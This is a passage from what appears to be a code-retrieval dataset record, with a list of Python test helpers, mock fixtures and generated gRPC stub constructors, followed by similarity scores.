'FeedInput': cardinality.Cardinality.UNARY_UNARY,\n 'GetResults': cardinality.Cardinality.UNARY_UNARY,\n }\n stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)\n return beta_implementations.dynamic_stub(channel, 'Hetr', cardinalities, options=stub_options)", "def create_generic_testcase(created_days_ago=28):\n testcase 
= data_types.Testcase()\n\n # Add more values here as needed. Intended to be the bare minimum for what we\n # need to simulate a test case.\n testcase.absolute_path = '/a/b/c/test.html'\n testcase.crash_address = '0xdeadbeef'\n testcase.crash_revision = 1\n testcase.crash_state = 'crashy_function()'\n testcase.crash_stacktrace = testcase.crash_state\n testcase.crash_type = 'fake type'\n testcase.comments = 'Fuzzer: test'\n testcase.fuzzed_keys = 'abcd'\n testcase.minimized_keys = 'efgh'\n testcase.fuzzer_name = 'fuzzer1'\n testcase.open = True\n testcase.one_time_crasher_flag = False\n testcase.job_type = 'test_content_shell_drt'\n testcase.status = 'Processed'\n testcase.timestamp = CURRENT_TIME - datetime.timedelta(days=created_days_ago)\n testcase.project_name = 'project'\n testcase.platform = 'linux'\n testcase.put()\n\n return testcase", "def create_test_conductor(**kw):\n conductor = get_test_conductor(**kw)\n # Let DB generate ID if it isn't specified explicitly\n if 'id' not in kw:\n del conductor['id']\n dbapi = db_api.get_instance()\n return dbapi.register_conductor(conductor)", "def subscription_factory_fixture():\n def _factory(capability):\n sub = Subscription()\n sub.capability = capability\n return sub\n return _factory", "def test_request():\n return make_response(\"ok\")", "def test_0_0_create(self):\n\n self.assertTrue(self.b1)", "def create_test_strategy(context, **kw):\n strategy = get_test_strategy(context, **kw)\n strategy.create()\n return strategy", "def create_test_action(context, **kw):\n action = get_test_action(context, **kw)\n action.create()\n return action", "def test041_test_instantiation(self):\n with pytest.raises(NotImplementedError):\n example = _Example()", "def __init__(self, test_name=\"\"):\r\n unittest.TestCase.__init__(self, test_name)", "def test_handle_create(self):\n test_user = User(\"userid\")\n test_user.permissions_level = Permissions.admin\n test_user.github_username = \"githubuser\"\n self.db.retrieve.return_value = test_user\n self.gh.org_create_team.return_value = \"team_id\"\n inputstring = \"team create b-s --name 'B S'\"\n outputstring = \"New team created: b-s, name: B S, \"\n self.assertTupleEqual(self.testcommand.handle(inputstring, user),\n (outputstring, 200))\n inputstring += \" --platform web\"\n outputstring += \"platform: web, \"\n self.assertTupleEqual(self.testcommand.handle(inputstring, user),\n (outputstring, 200))\n self.gh.org_create_team.assert_called()\n self.gh.add_team_member.assert_called_with('githubuser', 'team_id')\n inputstring += \" --channel 'channelID'\"\n outputstring += \"added channel, \"\n self.sc.get_channel_users.return_value = ['someID', 'otherID']\n self.assertTupleEqual(self.testcommand.handle(inputstring, user),\n (outputstring, 200))\n self.sc.get_channel_users.assert_called_once_with(\"channelID\")\n self.db.retrieve.assert_called_with(User, 'otherID')\n self.gh.add_team_member.assert_called()\n inputstring += \" --lead 'someID'\"\n outputstring += \"added lead\"\n self.gh.has_team_member.return_value = False\n print(self.testcommand.handle(inputstring, user))\n self.assertTupleEqual(self.testcommand.handle(inputstring, user),\n (outputstring, 200))\n self.db.store.assert_called()", "def create_stub(self, iface, instance_id=None,\n endpoint=None, timeout=None, auth_key=None):\n if not iface or issubclass(iface, Descriptor):\n raise Exception(\"No iface given\")\n iface_name = iface.DESCRIPTOR.full_name\n self._logger.debug(\"Creating stub for %s\" % iface_name)\n if not auth_key:\n auth_key = 
self._auth_key\n return StubImpl(iface, instance_id, self._rca, endpoint, timeout, auth_key)", "def create_switch():\n connection = MagicMock()\n connection.address = 'addr'\n connection.port = 'port'\n connection.protocol.version = 0x04\n switch = Switch('00:00:00:00:00:00:00:01', connection)\n switch._enabled = True\n return switch", "def beta_create_RoutingInterface_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):\n request_serializers = {\n ('routing.RoutingInterface', 'RoutingInterfaceGet'): RoutingInterfaceGetRequest.SerializeToString,\n ('routing.RoutingInterface', 'RoutingInterfaceInitialize'): RoutingInterfaceInitializeRequest.SerializeToString,\n ('routing.RoutingInterface', 'RoutingInterfaceNotificationRefresh'): RoutingInterfaceNotificationRefreshRequest.SerializeToString,\n ('routing.RoutingInterface', 'RoutingInterfaceNotificationRegister'): RoutingInterfaceNotificationRegisterRequest.SerializeToString,\n ('routing.RoutingInterface', 'RoutingInterfaceNotificationUnregister'): RoutingInterfaceNotificationUnregisterRequest.SerializeToString,\n }\n response_deserializers = {\n ('routing.RoutingInterface', 'RoutingInterfaceGet'): RoutingInterfaceGetResponse.FromString,\n ('routing.RoutingInterface', 'RoutingInterfaceInitialize'): RoutingInterfaceInitializeResponse.FromString,\n ('routing.RoutingInterface', 'RoutingInterfaceNotificationRefresh'): RoutingInterfaceNotificationRefreshResponse.FromString,\n ('routing.RoutingInterface', 'RoutingInterfaceNotificationRegister'): RoutingInterfaceNotificationResponse.FromString,\n ('routing.RoutingInterface', 'RoutingInterfaceNotificationUnregister'): RoutingInterfaceNotificationUnregisterResponse.FromString,\n }\n cardinalities = {\n 'RoutingInterfaceGet': cardinality.Cardinality.UNARY_UNARY,\n 'RoutingInterfaceInitialize': cardinality.Cardinality.UNARY_UNARY,\n 'RoutingInterfaceNotificationRefresh': cardinality.Cardinality.UNARY_UNARY,\n 'RoutingInterfaceNotificationRegister': cardinality.Cardinality.UNARY_STREAM,\n 'RoutingInterfaceNotificationUnregister': cardinality.Cardinality.UNARY_UNARY,\n }\n stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)\n return beta_implementations.dynamic_stub(channel, 'routing.RoutingInterface', cardinalities, options=stub_options)", "def test_constructor(self):\n pass", "def createTestSuite():\n import tests.functional.tests as functional\n return unittest.TestLoader().loadTestsFromModule(functional)", "def test_user(self):\n factory_generated = UserFactory()\n print(factory_generated)\n\n assert factory_generated is not None\n # assert False, \"dumb assert to make PyTest print my stuff\"", "def test_stub(self):\n\n stub = google.appengine.api.apiproxy_stub_map.apiproxy.GetStub(\n 'websocket')\n\n self.assertEqual(\n typhoonae.websocket.websocket_stub.WebSocketServiceStub,\n stub.__class__)\n\n self.assertRaises(\n typhoonae.websocket.websocket_stub.ConfigurationError,\n stub._GetEnviron, 'unknown')", "def test_method(self):", "def construct_fake(self, name: str) -> ResponsibleFake:\n fake: NaiveFake = getattr(self.faker, name)\n return lru_cache(maxsize=None)(lambda _: fake())", "def make_test_instance(cls, extensions, namespace='TESTING',\r\n propagate_map_exceptions=False):\r\n\r\n o = cls.__new__(cls)\r\n o._init_attributes(namespace,\r\n 
propagate_map_exceptions=propagate_map_exceptions)\r\n o._init_plugins(extensions)\r\n return o", "def test_create_obj_by_type(self):\n test_obj = mock.MagicMock()\n returned_obj = self.tested_class._create_obj_by_type(test_obj)\n self.assertIs(returned_obj, test_obj)", "def test_do_create(create_resource: MagicMock, response: execution.ResponseInfo):\n create_resource.return_value = response\n bundle = MagicMock()\n bundle.resources.matching.return_value = [MagicMock(), MagicMock()]\n action = interface.CommandAction(MagicMock(), [], bundle)\n interface.do_create(action)\n assert create_resource.call_count == 2", "def test_single_test_case():\n pass", "def test_create_from_pear(self):\n pass", "def spec_tests():\n pass", "def beta_create_OpenconfigRpcApi_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):\n request_serializers = {\n ('openconfig.OpenconfigRpcApi', 'Get'): GetRequest.SerializeToString,\n ('openconfig.OpenconfigRpcApi', 'GetDataEncodings'): GetDataEncodingsRequest.SerializeToString,\n ('openconfig.OpenconfigRpcApi', 'GetModels'): GetModelsRequest.SerializeToString,\n ('openconfig.OpenconfigRpcApi', 'Set'): SetRequest.SerializeToString,\n ('openconfig.OpenconfigRpcApi', 'SetDataEncoding'): SetDataEncodingRequest.SerializeToString,\n }\n response_deserializers = {\n ('openconfig.OpenconfigRpcApi', 'Get'): GetResponse.FromString,\n ('openconfig.OpenconfigRpcApi', 'GetDataEncodings'): GetDataEncodingsResponse.FromString,\n ('openconfig.OpenconfigRpcApi', 'GetModels'): GetModelsResponse.FromString,\n ('openconfig.OpenconfigRpcApi', 'Set'): SetResponse.FromString,\n ('openconfig.OpenconfigRpcApi', 'SetDataEncoding'): SetDataEncodingResponse.FromString,\n }\n cardinalities = {\n 'Get': cardinality.Cardinality.UNARY_UNARY,\n 'GetDataEncodings': cardinality.Cardinality.UNARY_UNARY,\n 'GetModels': cardinality.Cardinality.UNARY_UNARY,\n 'Set': cardinality.Cardinality.UNARY_UNARY,\n 'SetDataEncoding': cardinality.Cardinality.UNARY_UNARY,\n }\n stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers,\n response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)\n return beta_implementations.dynamic_stub(channel, 'openconfig.OpenconfigRpcApi', cardinalities, options=stub_options)", "def test_client_create(self, mock_input, mock_pass):\n # Patch username and password.\n mock_input.return_value = \"user\"\n mock_pass.return_value = \"pass\"\n\n # Instantiate Agave object making reference to local mock server.\n local_uri = \"http://localhost:{port}/\".format(port=self.mock_server_port)\n ag = Agave(api_server=local_uri)\n\n # Create client.\n ag.clients_create(\"client-name\", \"some description\")\n\n assert ag.api_key == \"some api key\"\n assert ag.api_secret == \"some secret\"", "def test_05_resource_create(self, Mock):\r\n pkg_request = FakeRequest(json.dumps(self.pkg_json_found), 200,\r\n {'content-type': 'application/json'})\r\n\r\n rsrc_request = FakeRequest(json.dumps(\r\n self.pkg_json_found['result']['resources'][0]),\r\n 200,\r\n {'content-type': 'text/html'})\r\n Mock.return_value = pkg_request\r\n with self.flask_app.test_request_context('/'):\r\n # Resource that exists\r\n app = App(short_name='urbanpark', name='Urban Parks')\r\n user = User(fullname='Daniel Lombrana Gonzalez')\r\n self.ckan.package_create(app=app, user=user, url=\"http://something.com\")\r\n Mock.return_value = rsrc_request\r\n out = 
self.ckan.resource_create(name='task')\r\n err_msg = \"It should create the task resource\"\r\n assert out[\"id\"] == self.task_resource_id, err_msg\r\n Mock.return_value = self.server_error\r\n try:\r\n self.ckan.resource_create(name='something-goes-wrong')\r\n except Exception as out:\r\n type, msg, status_code = out.args\r\n assert \"Server Error\" in msg, msg\r\n assert 500 == status_code, status_code\r\n assert \"CKAN: the remote site failed! resource_create failed\" == type, type", "def test_create(client):\n rv = create(client, reponame='Michael', url='https://github.com/Michael')\n assert json.loads(rv.data.decode())['code'] == 0\n assert json.loads(rv.data.decode())['owner'] == 'Michael'\n assert json.loads(rv.data.decode())['url'] == 'https://github.com/Michael'", "def proto_test(test):\n if isinstance(test, ProtoTest):\n return test\n else:\n return ProtoTest(test)", "def test_1():", "async def _create_server_stub_pair(\n *interceptors: aio.ServerInterceptor,\n) -> Tuple[aio.Server, test_pb2_grpc.TestServiceStub]:\n server_target, server = await start_test_server(interceptors=interceptors)\n channel = aio.insecure_channel(server_target)\n return server, test_pb2_grpc.TestServiceStub(channel)", "def Cpp_test():\n pass", "def test():", "def test():", "def testpackage(tmpdir, version='0.1'):\n\n return create_testpackage(tmpdir, version=version)", "def create_mock_api(cls):\n mock_api = Mock(spec=HookedAuroraClientAPI)\n mock_scheduler = Mock()\n mock_scheduler.url = \"http://something_or_other\"\n mock_scheduler_client = Mock()\n mock_scheduler_client.scheduler.return_value = mock_scheduler\n mock_scheduler_client.url = \"http://something_or_other\"\n mock_api = Mock(spec=HookedAuroraClientAPI)\n mock_api.scheduler = mock_scheduler_client\n return (mock_api, mock_scheduler_client)", "def create_test(self, test_case, file_name):\n with open(os.path.join(self.tests, file_name), 'w+') as f:\n f.write(test_case)", "def make_uri_fixture(name):\n # noinspection PyShadowingNames\n def func(conn):\n return conn.createURI('ex://' + name)\n func.__name__ = name\n return pytest.fixture(func, name=name)", "def __test__():\n#-------------------------------------------------------------------------------\n import pylib.tester as tester\n return 0", "def test_create_scenario(self):\n pass", "def load_test_account() -> BankAccount:\n budget_manager = BudgetCreator.load_test_budget_manager()\n return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)", "def ToTestResourceObj(self):\n return TestResourceObj(\n name=self.name,\n url=self.default_download_url,\n test_resource_type=self.test_resource_type,\n decompress=self.decompress or False,\n decompress_dir=self.decompress_dir or '',\n mount_zip=self.mount_zip or False,\n params=TestResourceParameters.Clone(self.params))", "def test_something():", "def test():\n\t\treturn 
[\"vice.core.objects.tests\",\n\t\t\t[\n\t\t\t\tagb.test_agb_grid_constructor(),\n\t\t\t\tagb.test_agb_grid_destructor(),\n\t\t\t\tcallback_1arg.test_callback_1arg_constructor(),\n\t\t\t\tcallback_1arg.test_callback_1arg_destructor(),\n\t\t\t\tcallback_2arg.test_callback_2arg_constructor(),\n\t\t\t\tcallback_2arg.test_callback_2arg_destructor(),\n\t\t\t\tccsne.test_ccsne_yield_specs_constructor(),\n\t\t\t\tccsne.test_ccsne_yield_specs_destructor(),\n\t\t\t\tchannel.test_channel_constructor(),\n\t\t\t\tchannel.test_channel_destructor(),\n\t\t\t\telement.test_element_constructor(),\n\t\t\t\telement.test_element_destructor(),\n\t\t\t\tfromfile.test_fromfile_constructor(),\n\t\t\t\tfromfile.test_fromfile_destructor(),\n\t\t\t\thydrodiskstars.test_hydrodiskstars_constructor(),\n\t\t\t\thydrodiskstars.test_hydrodiskstars_destructor(),\n\t\t\t\timf.test_imf_constructor(),\n\t\t\t\timf.test_imf_destructor(),\n\t\t\t\tintegral.test_integral_constructor(),\n\t\t\t\tintegral.test_integral_destructor(),\n\t\t\t\tinterp_scheme_1d.test_interp_scheme_1d_constructor(),\n\t\t\t\tinterp_scheme_1d.test_interp_scheme_1d_destructor(),\n\t\t\t\tinterp_scheme_2d.test_interp_scheme_2d_constructor(),\n\t\t\t\tinterp_scheme_2d.test_interp_scheme_2d_destructor(),\n\t\t\t\tism.test_ism_constructor(),\n\t\t\t\tism.test_ism_destructor(),\n\t\t\t\tmdf.test_mdf_constructor(),\n\t\t\t\tmdf.test_mdf_destructor(),\n\t\t\t\tmigration.test_migration_constructor(),\n\t\t\t\tmigration.test_migration_destructor(),\n\t\t\t\tmultizone.test_multizone_constructor(),\n\t\t\t\tmultizone.test_multizone_destructor(),\n\t\t\t\tsinglezone.test_singlezone_constructor(),\n\t\t\t\tsinglezone.test_singlezone_destructor(),\n\t\t\t\tsneia.test_sneia_yield_specs_constructor(),\n\t\t\t\tsneia.test_sneia_yield_specs_destructor(),\n\t\t\t\tssp.test_ssp_constructor(),\n\t\t\t\tssp.test_ssp_destructor(),\n\t\t\t\ttracer.test_tracer_constructor(),\n\t\t\t\ttracer.test_tracer_destructor()\n\t\t\t]\n\t\t]", "def make_test_instance(cls, extensions, namespace='TESTING',\r\n propagate_map_exceptions=False):\r\n\r\n o = cls.__new__(cls)\r\n names = [e.name for e in extensions]\r\n o._init_attributes(namespace, names,\r\n propagate_map_exceptions=propagate_map_exceptions)\r\n o._init_plugins(extensions)\r\n return o", "def test_initialize_hypervisor(self, create_mock, libvirt_mock):\n resources = lxc.LXCResources('foo', {'domain': 'bar', 'hypervisor': 'baz'})\n libvirt_mock.open.assert_called_with('baz')\n create_mock.assert_called_with(resources.hypervisor, 'foo', 'bar', network_name=None)", "def test_10(self, test):\r\n return test.MANUAL()", "def create_test_node(**kw):\n node = get_test_node(**kw)\n # Let DB generate an ID if one isn't specified explicitly.\n # Creating a node with tags or traits will raise an exception. 
If tags or\n # traits are not specified explicitly just delete them.\n for field in {'id', 'tags', 'traits'}:\n if field not in kw:\n del node[field]\n dbapi = db_api.get_instance()\n return dbapi.create_node(node)", "def create_test_user():\n return User.objects.create(username='test_username', password='test_password')", "def beta_create_KratosService_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):\n request_serializers = {\n ('kratos.KratosService', 'AddRule'): AddRuleRequest.SerializeToString,\n ('kratos.KratosService', 'AddService'): AddServiceRequest.SerializeToString,\n ('kratos.KratosService', 'DeleteRule'): DeleteRuleRequest.SerializeToString,\n ('kratos.KratosService', 'DeleteService'): DeleteServiceRequest.SerializeToString,\n ('kratos.KratosService', 'ResetCounter'): ResetCounterRequest.SerializeToString,\n ('kratos.KratosService', 'Status'): StatusRequest.SerializeToString,\n }\n response_deserializers = {\n ('kratos.KratosService', 'AddRule'): AddRuleResponse.FromString,\n ('kratos.KratosService', 'AddService'): AddServiceResponse.FromString,\n ('kratos.KratosService', 'DeleteRule'): DeleteRuleResponse.FromString,\n ('kratos.KratosService', 'DeleteService'): DeleteServiceResponse.FromString,\n ('kratos.KratosService', 'ResetCounter'): ResetCounterResponse.FromString,\n ('kratos.KratosService', 'Status'): StatusResponse.FromString,\n }\n cardinalities = {\n 'AddRule': cardinality.Cardinality.UNARY_UNARY,\n 'AddService': cardinality.Cardinality.UNARY_UNARY,\n 'DeleteRule': cardinality.Cardinality.UNARY_UNARY,\n 'DeleteService': cardinality.Cardinality.UNARY_UNARY,\n 'ResetCounter': cardinality.Cardinality.UNARY_UNARY,\n 'Status': cardinality.Cardinality.UNARY_UNARY,\n }\n stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)\n return beta_implementations.dynamic_stub(channel, 'kratos.KratosService', cardinalities, options=stub_options)", "def create_success(test, time):\n return _TestInfo(test, time)" ]
[ "0.74640894", "0.68726027", "0.65086746", "0.6226904", "0.59744567", "0.5875409", "0.5875409", "0.5869115", "0.5800327", "0.57175136", "0.5705263", "0.5691941", "0.5661378", "0.5658473", "0.5648882", "0.5639574", "0.5630987", "0.5609541", "0.55923575", "0.55062956", "0.5492857", "0.54765517", "0.5466594", "0.54480326", "0.5427351", "0.5409014", "0.5395724", "0.5383768", "0.53359103", "0.53072935", "0.5302184", "0.53010035", "0.5298375", "0.5296451", "0.5276808", "0.5272885", "0.5243893", "0.5227209", "0.5224465", "0.5221786", "0.5211996", "0.52026695", "0.519507", "0.5190788", "0.51872694", "0.5177702", "0.5175054", "0.5170886", "0.5169307", "0.5163448", "0.5161105", "0.5156539", "0.5155834", "0.5149371", "0.51434237", "0.5139249", "0.5135974", "0.51255053", "0.5124553", "0.5123119", "0.5114417", "0.5110398", "0.5104794", "0.50970143", "0.50869966", "0.50729084", "0.5068957", "0.50671834", "0.5064739", "0.5063914", "0.5059509", "0.50588727", "0.5050128", "0.5041992", "0.50401235", "0.5039517", "0.5037861", "0.50288594", "0.5028654", "0.5026903", "0.50261384", "0.502355", "0.502355", "0.50073075", "0.50065345", "0.4991152", "0.49864", "0.49743497", "0.49731818", "0.49719873", "0.49712515", "0.49682152", "0.49678838", "0.49637467", "0.49617383", "0.49591455", "0.4958782", "0.4958134", "0.4954969", "0.49531916" ]
0.7049483
1
Checks whether the parameters sent in the array param correspond to a physical model, i.e. whether one of the minima is close to the experimentally verified Higgs vev v and one of the masses corresponds to the experimentally verified Higgs mass.
def CheckCouplings(params, verbose=False):
    l1 = params[0]
    l2 = params[1]
    l3 = params[2]
    gx = params[3]
    m = model_2f(l1, l2, l3, y_t_interpol(np.log(v/mz)), gx)
    minima, success = m.findMinimum() #the boolean success is added because we cannot trust the minima if numpy.optimize.minimize has failed
    if not verbose:
        tolvevh = 2.0
        tolmh = 2.0
        condition0 = abs(minima-v) < tolvevh
        if condition0.any() and success:
            ddVtot = nd.Hessian(m.Vtot_0T)
            hess = ddVtot(minima)
            masses = np.linalg.eigvalsh(hess) #computes masses...
            positive_condition = masses > 0
            if(positive_condition.all()): #we will only check them IF they are positive
                masses = np.sqrt(np.abs(masses))
                condition1 = abs(masses-mh) < tolmh
                if condition1.any():
                    stability = m.CheckStability() #we check the stability of the model
                    f = open(file_name, 'a')
                    line0 = str(l1)+' '+str(l2)+' '+str(l3)+' '+str(gx)+' '+str(minima[0])+' '+str(minima[1])+' '+str(masses[0])+' '+str(masses[1]) #we print everything
                    line0 = line0 + ' '+str(stability)
                    f.write(line0+'\n')
                    f.write('-'*90+'\n')
                    f.close()
    else:
        """ Just checks the minima of the model m, the masses of the particles and whether it is stable or not
        Output: prints the information """
        print "Minimum at T = 0.0: ", minima, success
        print "Masses: "
        ddVtot = nd.Hessian(m.Vtot_0T)
        hess = ddVtot(minima)
        print np.sqrt(np.linalg.eigvalsh(hess))
        print 'Stable: ', m.CheckStability()==1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def matches(self, aModel):\n\n params_bis = list(map(aModel.string_to_param,self.grid_params))\n for param1, param2 in zip(self.params, params_bis):\n if (abs(param1/param2 - 1.0) > eps): return False\n return True", "def check_params(self, model_params):\n\n comm = self.comm\n for param, policy in self.noise_policy.items():\n low_bound, up_bound, absify, low_bound_diagonal = policy\n new_pvalue = model_params[param]\n if np.isscalar(new_pvalue): # Param to be noisified is scalar\n if comm.rank == 0:\n if new_pvalue < low_bound:\n print(\"check_params: Reset lower bound of %s\" % param)\n new_pvalue = low_bound\n if new_pvalue >= up_bound:\n print(\"check_params: Reset upper bound of %s\" % param)\n new_pvalue = up_bound\n if absify:\n print(\"check_params: Taking abs of %s\" % param)\n new_pvalue = np.abs(new_pvalue)\n if (\n low_bound_diagonal is not None\n ): # when using isotropic instead of full matrix\n if new_pvalue < low_bound_diagonal:\n print(\"check_params: Reset lower bound of %s (diagonal)\" % param)\n new_pvalue = low_bound_diagonal\n new_pvalue = comm.bcast(new_pvalue)\n else:\n if comm.rank == 0:\n if (new_pvalue < low_bound).any():\n print(\"check_params: Reset lower bound of %s\" % param)\n if (new_pvalue >= up_bound).any():\n print(\"check_params: Reset upper bound of %s\" % param)\n new_pvalue = np.maximum(low_bound, new_pvalue)\n new_pvalue = np.minimum(up_bound, new_pvalue)\n if absify:\n print(\"check_params: Taking abs of %s\" % param)\n new_pvalue = np.abs(new_pvalue)\n if low_bound_diagonal is not None:\n mask = np.diag(new_pvalue) < low_bound_diagonal\n if mask.any():\n print(\"check_params: Reset lower bound of %s (diagonal)\" % param)\n new_pvalue[np.diag(mask)] = low_bound_diagonal\n comm.Bcast([new_pvalue, MPI.DOUBLE])\n model_params[param] = new_pvalue\n\n return model_params", "def _check_params(self):\n\t\tstrange_param_helper = False\n\t\tfor param in self.params:\n\t\t\n\t\t\t# It could be that the param encapsulates several values (e.g., \"FLUX_RADIUS(10)\")\n\t\t\t# So we have to dissect this\n\t\t\tmatch = re.compile(\"(\\w*)\\(\\d*\\)\").match(param)\n\t\t\tif match:\n\t\t\t\tcleanparam = match.group(1)\n\t\t\telse:\n\t\t\t\tcleanparam = param\n\t\t\t\t\n\t\t\tif cleanparam not in self.fullparamlist:\n\t\t\t\tlogger.warning(\"Parameter '%s' seems strange and might be unknown to SExtractor\" \\\n % (param))\n\t\t\t\tstrange_param_helper = True\n\t\t\t\t\n\t\tif strange_param_helper:\n\t\t\tlogger.warning(\"Known parameters are: %s\" % (self.fullparamtxt))", "def check_grid_params(params_full, source, precision=6, kgrid=None):\n source = grid_strings.source_shorthand(source=source)\n n_models = len(params_full['x'])\n any_matches = None\n\n if kgrid is None:\n print('No kgrid provided. 
Loading:')\n kgrid = grid_analyser.Kgrid(source=source, load_lc=False,\n powerfits=False, verbose=False)\n for i in range(n_models):\n model_param = {}\n\n for key, vals in params_full.items():\n val_rounded = float(f'{vals[i]:.{precision}f}')\n model_param[key] = val_rounded\n\n model = kgrid.get_params(params=model_param)\n\n if len(model) == 0:\n any_matches = False\n else:\n print('WARNING: a model with the following params already exists:')\n for var, v in model_param.items():\n print(f'{var} = {v:.3f}')\n any_matches = True\n break\n\n return any_matches", "def check_params(self, model_params):\n return model_params", "def check_param(self):\n if scipy.ndim(self.param['initial_heading'].shape) > 1:\n raise(ValueError, 'initial_heading must have ndim=1')\n\n equal_shape_list = ['x_start_position','y_start_position','flight_speed','release_time']\n for item in equal_shape_list:\n if self.param[item].shape != self.param['initial_heading'].shape:\n raise(ValueError, '{0}.shape must equal initial_heading.shape'.format(item))", "def checkParamsError(self):\n # check if parameter combinations match with the simulation filename.\n for i, f in enumerate(self.yadeDataFiles):\n # get the file name fore the suffix\n f = f.split('.' + f.split('.')[-1])[0]\n # get parameters from the remaining string\n paramsString = f.split('_')[-self.numParams:]\n # element wise comparison of the parameter vector\n if not (np.abs((np.float64(paramsString) - self.getSmcSamples()[-1][i])\n / self.getSmcSamples()[-1][i] < 1e-10).all()):\n raise RuntimeError(\n \"Parameters \" + \", \".join(\n [\"%s\" % v for v in self.getSmcSamples()[-1][i]]) + \" do not match with the data file name \" + f)", "def _is_parameters_ok(self):\n if self.maxresult is None:\n raise MissingParameterException(\"Arithmetics neuron needs maxresult parameter.\")\n\n return True", "def check_state(self):\n if not self.__is_valid:\n raise GmParamError(\"Parameters of the model has not been\"\\\n \"set yet, please set them using self.set_param()\")\n\n # Check condition number for cov matrix\n if self.mode == 'diag':\n tinfo = N.finfo(self.va.dtype)\n if N.any(self.va < tinfo.eps):\n raise GmParamError(\"variances are singular\")\n elif self.mode == 'full':\n try:\n d = self.d\n for i in range(self.k):\n N.linalg.cholesky(self.va[i*d:i*d+d, :])\n except N.linalg.LinAlgError:\n raise GmParamError(\"matrix %d is singular \" % i)\n\n else:\n raise GmParamError(\"Unknown mode\")\n\n return True", "def check_PLSR_input():\r\n\r\n RM.check_if_ndim_array(model_data, 3, 'Model data')\r\n RM.check_if_bigger(model_data.shape[1], meta_model.get_in_par_means().shape[1],\r\n 'The number of input parameters in the solution matrix',\r\n 'the number of input parameters')\r\n RM.warn_if_bigger(model_data.shape[1], meta_model.get_in_par_means().shape[1] + 1,\r\n 'The number of input parameters',\r\n 'the number of input parameters in the solution matrix')\r\n RM.check_if_bigger(model_data.shape[2], meta_model.get_out_par_means().shape[1] - 1,\r\n 'The number of output parameters in the solution matrix',\r\n 'the number of output parameters')\r\n RM.warn_if_bigger(model_data.shape[2], meta_model.get_out_par_means().shape[1],\r\n 'The number of output parameters',\r\n 'the number of output parameters in the solution matrix')\r\n\r\n # Check if the additional data is correct\r", "def input_check(self):\n\n if self.species == 'He': assert self.line_model == 'voigt'\n n_upper_range, e_dens_range, temp_range, b_field_range = get_param_ranges(self.line_model)\n\n if 
np.isnan(n_upper_range).sum() <= 1:\n assert (self.n_upper in range(n_upper_range[0], n_upper_range[1]))\n if np.isnan(e_dens_range).sum() <= 1:\n assert (e_dens_range[0] <= self.e_dens <= e_dens_range[1])\n if np.isnan(temp_range).sum() <= 1:\n assert (temp_range[0] <= self.temp <= temp_range[1])\n if np.isnan(b_field_range).sum() <= 1:\n assert (b_field_range[0] <= self.b_field <= b_field_range[1])", "def check_params(self):\r\n \r\n # TODO: More cases?\r\n\r\n if self.N <= 0:\r\n print('Bad Parameter: N')\r\n \r\n if self.Ha_tally <= 0 or self.Ha_tally > self.N:\r\n print('Bad Parameter: Reported winner tally')\r\n \r\n if len(self.round_sched) < 1 or not self.check_inc_sched(self.round_sched):\r\n print('Bad Parameter: Round Schedule')\r\n\r\n if self.alpha <= 0 or self.alpha >= .5:\r\n print('Bad Parameter: Alpha')", "def check_additional_input():\r\n\r\n # Check if the cluster center input is correct\r\n RM.check_if_matrix(clust_cent, 'The cluster centers')\r\n RM.warn_if_bigger(clust_cent.shape[1], meta_model.get_in_par_means().shape[1],\r\n 'The number of input parameters in the cluster centers',\r\n 'the number of input parameters - 1')\r\n RM.check_if_bigger(clust_cent.shape[1], meta_model.get_in_par_means().shape[1] - 1,\r\n 'The number of input parameters',\r\n 'the number of input parameters in the cluster centers')\r\n\r\n bounds = meta_model.get_in_par_intervals()\r\n\r\n for j in range(clust_cent.shape[0]):\r\n for i in range(bounds.shape[0]):\r\n RM.check_if_in_interval(bounds[i], clust_cent[j, i], i, ' In cluster center %x, the value')\r\n\r\n def check_PLSR_input():\r\n \"\"\" Checks model data of PLSR\r\n\r\n :return: Checks model data of PLSR\r\n \"\"\"\r\n\r\n RM.check_if_ndim_array(model_data, 3, 'Model data')\r\n RM.check_if_bigger(model_data.shape[1], meta_model.get_in_par_means().shape[1],\r\n 'The number of input parameters in the solution matrix',\r\n 'the number of input parameters')\r\n RM.warn_if_bigger(model_data.shape[1], meta_model.get_in_par_means().shape[1] + 1,\r\n 'The number of input parameters',\r\n 'the number of input parameters in the solution matrix')\r\n RM.check_if_bigger(model_data.shape[2], meta_model.get_out_par_means().shape[1] - 1,\r\n 'The number of output parameters in the solution matrix',\r\n 'the number of output parameters')\r\n RM.warn_if_bigger(model_data.shape[2], meta_model.get_out_par_means().shape[1],\r\n 'The number of output parameters',\r\n 'the number of output parameters in the solution matrix')\r\n\r\n # Check if the additional data is correct\r\n\r\n if meta_model.get_type() == 'PLSR': # Additional check-up for PLSR\r\n check_PLSR_input()\r\n\r\n elif meta_model.get_type() == 'DLU': # Additional check-up for DLU\r\n raise TypeError('This part is not implemented yet')\r\n\r\n # if not isinstance(model_data, np.ndarray):\r\n # raise TypeError('The cluster input and output data is not stored in a multidimensional array')\r\n #\r\n # for clust_data in model_data:\r\n #\r\n # if not isinstance(clust_data[0], np.matrix) or not isinstance(clust_data[1], np.matrix):\r\n # raise TypeError('One of the input or output databases is not a matrix')\r\n #\r\n # if clust_data[0].shape[1] > meta_model.get_in_par_means().shape[1]:\r\n # warnings.warn('The number of input parameters for the input database of the clusters is bigger '\r\n # 'than the actual number of input parameters')\r\n #\r\n # elif clust_data[0].shape[1] < meta_model.get_in_par_means().shape[1]:\r\n # raise TypeError('The number of input parameters for the input database 
